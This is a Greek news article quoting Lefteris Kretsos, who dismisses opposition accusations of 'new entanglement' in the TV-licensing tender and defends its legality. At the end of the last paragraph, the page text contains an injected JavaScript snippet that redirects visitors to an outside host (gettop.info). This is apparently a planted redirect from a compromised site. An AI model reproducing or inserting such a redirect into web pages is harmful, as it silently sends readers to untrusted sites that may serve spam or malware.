Κρέτσος: Αστεία πράγματα τα περί νέας διαπλοκής

0
13

 

«Αστεία πράγματα» χαρακτήρισε ο γενικός γραμματέας Ενημέρωσης και Επικοινωνίας, Λευτέρης Κρέτσος, τις αιτιάσεις της αντιπολίτευσης περί «νέας διαπλοκής» στο ραδιοτηλεοπτικό τοπίο, με αφορμή τη διαδικασία αδειοδότησης των τηλεοπτικών σταθμών.

«Η σφοδρή κριτική από την αντιπολίτευση είναι γιατί 27 χρόνια δεν έκαναν αυτό που έπρεπε, δηλαδή δεν έβαλαν τους καναλάρχες να πληρώσουν και οι καναλάρχες νέμονταν αυτό το δημόσιο αγαθό και τις ραδιοτηλεοπτικές συχνότητες, προς ίδιον όφελος» είπε ο κ. Κρέτσος στο «Πρακτορείο 104,9 fm» και πρόσθεσε: «Μιλάμε για απόλυτη διαφάνεια, αυτές είναι οι προθέσεις μας για το πώς θέλουμε τα επόμενα κανάλια να λειτουργούν και όλα τα άλλα είναι αστεία. Αυτό φάνηκε και από τον διαγωνισμό, γιατί, όπως οργανώθηκε, η κυβέρνηση δεν μπορούσε να πριμοδοτήσει καμία επιχείρηση, κανένα επιχειρηματικό συμφέρον».

Για την επικείμενη απόφαση του ΣτΕ στο θέμα των τηλεοπτικών αδειών ο γγ είπε: «Θεωρούμε πως ό,τι κάναμε ήταν απόλυτα σύννομο. Εγώ δε σχολιάζω ποτέ, ούτε θέλω να αναφερθώ σε θέματα που έχουν να κάνουν με τη Δικαιοσύνη. Θεωρούμε μόνο ό,τι κάναμε το σωστό και μέσα στα πλαίσια που ορίζει ο νόμος». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here